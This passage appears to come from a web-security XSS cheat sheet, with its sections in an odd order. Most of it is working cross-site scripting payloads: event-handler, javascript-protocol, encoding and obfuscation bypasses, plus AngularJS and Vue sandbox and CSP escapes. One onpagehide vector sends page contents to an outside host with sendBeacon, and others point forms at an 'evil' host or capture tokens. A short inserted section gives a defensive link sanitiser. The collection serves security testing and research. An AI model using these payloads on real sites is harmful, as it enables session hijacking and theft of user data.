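`demo().hex.normalised` comes back as `window['alert'](window['document']['domain'])` and `demo().base64.globals` as `eval`, `alert`, `atob`, which is what a rule should match on. The RegExp `.source` and JSFuck entries further down are built from operators rather than escapes, so this decoder leaves them unchanged; they need evaluation in a sandbox or a different signature, which is the practical limit of text normalisation.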

Impossible labs

Title | Description | Length limit | Closest vector

Basic context, WAF blocks <[a-zA-Z]

This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <tag.

Length limit: N/A. Closest vector: N/A.

Script based injection, but quotes, forward slash and backslash are escaped

We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/back slashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.

Length limit: N/A. Closest vector: N/A.

innerHTML context, but no equals allowed

You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.

Length limit: N/A. Closest vector: N/A.

Basic context, length limit

This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?

Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit

The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, "oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?

Length limit: 14. Closest vector: "oncut=alert`` (with a trailing space)

Basic context, length limit, arbitrary code

It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.

Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code

Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.

Length limit: 17. Closest vector: see link.

Injection occurs inside a frameset but before the body

We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.

Length limit: N/A. Closest vector: N/A.

Injection occurs inside a single quoted string, only characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.

Length limit: N/A. Closest vector: N/A.

Classic vectors (XSS crypt)

Image src with JavaScript protocol

<img src=javascript:alert(1)>

Body background with JavaScript protocol

<body background=javascript:alert(1)>

Iframe data URLs no longer work, as modern browsers use a null origin

<iframe src=data:text/html,<img src=1 onerror=alert(document.domain)>>

VBScript protocol, used to work in IE

<a href=vbscript:MsgBox+1>XSS</a>
<a href='' onclick=vbs:Msgbox+1>XSS</a>
<a href='' onclick=VBS:Msgbox+1>XSS</a>
<a href='' onclick=vbscript:Msgbox+1>XSS</a>
<a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a>
<a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript.Compact was a minimal version of JS that wasn't widely used in IE

<a href='' onclick=jscript.compact:alert(1)>test</a>
<a href='' onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScript.Encode allows encoded JavaScript

<a href='' language=JScript.Encode onclick=#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a>
<a href='' onclick=JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a>

VBScript.Encode allows encoded VBScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities, used to work in Netscape Navigator

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup

<form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" >

CSS expressions, <= IE7

<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :

<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){ } </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>

GreyMagic HTML+time exploit (no longer works, even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &

<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities

<a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments

<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG

<svg><xss onload=alert(1)>

Isindex using src attribute

<isindex type=image src=//evil?

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Credits: Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


onmouseup Triggered when the mouse button is released <xss onmouseup=alert(1)>test</xss> Compatibility:

onmousewheel Fires when the mouse wheel scrolls <xss onmousewheel=alert(1)>requires scrolling Compatibility:

onmozfullscreenchange Fires when a video changes full screen status <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls> Compatibility:

onpagehide Fires when the page is changed <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)> Compatibility:

onpaste Requires you paste a piece of text <a onpaste=alert(1) contenteditable>test</a> Compatibility:

onpause Requires clicking the element to pause <audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio> Compatibility:

onpointerdown Fires on mouse down <xss onpointerdown=alert(1)>XSS</xss> Compatibility:

onpointerenter Fires on mouse enter <xss onpointerenter=alert(1)>XSS</xss> Compatibility:

onpointerleave Fires on mouse leave <xss onpointerleave=alert(1)>XSS</xss> Compatibility:

onpointermove Fires on mouse move <xss onpointermove=alert(1)>XSS</xss> Compatibility:

onpointerout Fires on mouse out <xss onpointerout=alert(1)>XSS</xss> Compatibility:

onpointerover Fires on mouse over <xss onpointerover=alert(1)>XSS</xss> Compatibility:

onpointerrawupdate Fires when the pointer changes <xss onpointerrawupdate=alert(1)>XSS</xss> Compatibility:

onpointerup Fires on mouse up <xss onpointerup=alert(1)>XSS</xss> Compatibility:

onreset Requires a click <form onreset=alert(1)><input type=reset> Compatibility:

onsearch Fires when a form is submitted and the input has a type attribute of search <form><input type=search onsearch=alert(1) value="Hit return" autofocus> Compatibility:

onseeked Requires clicking the element timeline <audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio> Compatibility:

onseeking Requires clicking the element timeline <audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio> Compatibility:

onselect Requires you select text <input onselect=alert(1) value=XSS autofocus> Compatibility:

onselectionchange Fires when the text selection on the page changes <body onselectionchange=alert(1)>select some text Compatibility:

onselectstart Fires when beginning a text selection <body onselectstart=alert(1)>select some text Compatibility:

onshow Fires when a context menu is shown <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div> Compatibility:

onsubmit Requires a form submission <form onsubmit=alert(1)><input type=submit> Compatibility:

ontouchend Fires when a touch ends (touch screen, mobile devices only) <body ontouchend=alert(1)> Compatibility:

ontouchmove Fires when a touch moves (touch screen, mobile devices only) <body ontouchmove=alert(1)> Compatibility:

ontouchstart Fires when a touch starts (touch screen, mobile devices only) <body ontouchstart=alert(1)> Compatibility:

onvolumechange Requires volume adjustment <audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio> Compatibility:

onwheel Fires when you use the mouse wheel <body onwheel=alert(1)> Compatibility:

Restricted characters

No parentheses, using exception handling

<script>onerror=alert;throw 1</script>

No parentheses, using exception handling, no semicolons

<script>{onerror=alert}throw 1</script>

No parentheses, using exception handling, no semicolons, using expressions

<script>throw onerror=alert,1</script>

No parentheses, using exception handling and eval

<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses, using exception handling and eval, on Firefox

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses, using ES6 hasInstance and instanceof with eval

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses, using ES6 hasInstance and instanceof with eval, without

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses, using location redirect

<script>location='javascript:alert\x281\x29'</script>

No parentheses, using location redirect, no strings

<script>location=name</script>

No parentheses, using template strings

<script>alert`1`</script>

No parentheses, using template strings and location hash

<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash

<script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event

<xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event

<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute, JavaScript protocol

<iframe src=javascript:alert(1)>

Object data attribute with JavaScript protocol

<object data=javascript:alert(1)>

Embed src attribute with JavaScript protocol

<embed src=javascript:alert(1)>

A standard JavaScript protocol

<a href=javascript:alert(1)>XSS</a>

The protocol is not case sensitive

<a href=JaVaScript:alert(1)>XSS</a>

Characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed inside the protocol

<a href="javas\x09cript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed after the protocol name, before the colon

<a href="javascript\x09:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol

<svg><a xlink:href=javascript:alert(1)><text x=20 y=20>XSS</text></a>

SVG animate tag using values

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src

<script src=data:text/javascript,alert(1)></script>

SVG script href attribute without closing script tag

<svg><script href=data:text/javascript,alert(1) />

SVG use element (Chrome/Firefox)

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL

<script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol, rewriting relative URLs

<base href=javascript:/a/-alert(1)///><a href=../lol/safari.html>test</a>

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL

<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form

<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements

<input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements

<link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage

<a href="" download="filename.html">Test</a>

Disable referrer using referrerpolicy

<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function

<a href="" onclick='window.open("http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//","alert(1)")'>XSS</a>

Set window.name via name attribute in an <iframe> tag

<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>

Set window.name via target attribute in a <base> tag

<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag

<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag

<img src="validimage.png" width=10 height=10 usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag

<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag, type submit

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag, type image

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain

<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute, UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox

<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer

<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8

%C0%BCscript>alert(1)</script>
%E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script>
%F8%80%80%80%BCscript>alert(1)</script>
%FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes

<script>\u0061lert(1)</script>

Unicode escapes, ES6 style

<script>\u{61}lert(1)</script>

Unicode escapes, ES6 style, zero padded

<script>\u{0000000061}lert(1)</script>

Hex encoding, JavaScript escapes

<script>eval('\x61lert(1)')</script>

Octal encoding

<script>eval('\141lert(1)')</script>
<script>eval(alert(\061))</script>
<script>eval(alert(\61))</script>

Decimal encoding with optional semi-colon

<a href="&#106avascript:alert(1)">XSS</a>
<a href="&#106;avascript:alert(1)">XSS</a>

SVG script with HTML encoding

<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros

<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities

<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon, provided the next character is not a-f0-9

<a href="j&#x61vascript:alert(1)">XSS</a>
<a href="&#x6a avascript:alert(1)">XSS</a>
<a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros

<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive

<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities

<a href="javascript&colon;alert(1)">XSS</a>
<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding

<a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding

<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
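The Protocols and Encoding sections above list the ways a `javascript:` scheme survives a naive filter: mixed case, control characters before or inside the scheme, and numeric or named character references for individual letters. The following is an added example, not code from the cheat sheet, of the check a link sanitiser should perform instead: decode character references once (as the HTML parser does for an attribute value), remove control characters and spaces, then compare the scheme against an allow-list. The function names, the `NAMED_REFS` table and the default allow-list are my own choices; the named references included are the ones used in this section, not the full HTML5 list.

```javascript
// Added example (not from the cheat sheet): decide whether an untrusted link target
// resolves to an allowed scheme after undoing the entity, case and whitespace tricks
// listed in the Protocols and Encoding sections. Function names are my own.

// Named references that appear in protocol-smuggling vectors (not the full HTML5 list).
const NAMED_REFS = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')', percnt: '%',
  sol: '/', semi: ';', quot: '"', apos: "'", lt: '<', gt: '>', amp: '&',
};

// Guard fromCodePoint against out-of-range numeric references.
function codePointToString(n) {
  return n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}

// One round of character-reference decoding, as the HTML parser applies to an
// attribute value: hex and decimal numeric references in any case, with leading
// zeros and with or without the semicolon, plus the named ones above.
function decodeHtmlRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointToString(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => codePointToString(parseInt(d, 10)))
    .replace(/&([A-Za-z]+);?/g, (m, name) =>
      Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m);
}

// true when the value is relative or its scheme is on the allow-list.
// Deliberately stricter than the URL parser: every control character and space is
// removed before the scheme is read, not only leading ones and tab/LF/CR, so
// "javas\tcript:", " javascript:" and "&#x6a avascript:" all collapse to the same form.
function isSafeHref(raw, allowedSchemes = ['http', 'https']) {
  const decoded = decodeHtmlRefs(String(raw));
  const compact = decoded.replace(/[\u0000-\u0020\u007f]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(compact);
  if (m === null) return true; // no scheme: path- or fragment-relative
  return allowedSchemes.includes(m[1].toLowerCase());
}
```

`isSafeHref('https://example.com/')` and `isSafeHref('/account')` return true; every `javascript:` variant from this section, including `java&Tab;script:alert(1)` and `&#0000106avascript:alert(1)`, returns false, as does `data:`. The check only answers the scheme question: a scheme-relative `//host` link passes, so where an allowed `http(s)` link points is a separate decision (open redirect), and overlong UTF-8 sequences such as `%C0%BC` have to be rejected by the layer that decodes the request, before the value reaches this function.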

Obfuscation

Data protocol inside script src with base64

<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities

<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding

<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc HTML encoded

<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding

<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length | Vector

All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>

All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes, reflected

Version | Author | Length | Vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.2.27-1.2.29 / 1.3.0-1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}

1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}

1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}

>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()

1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

1.2.27-1.2.29 / 1.3.0-1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)

1.4.0-1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()

1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length | Vector

All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

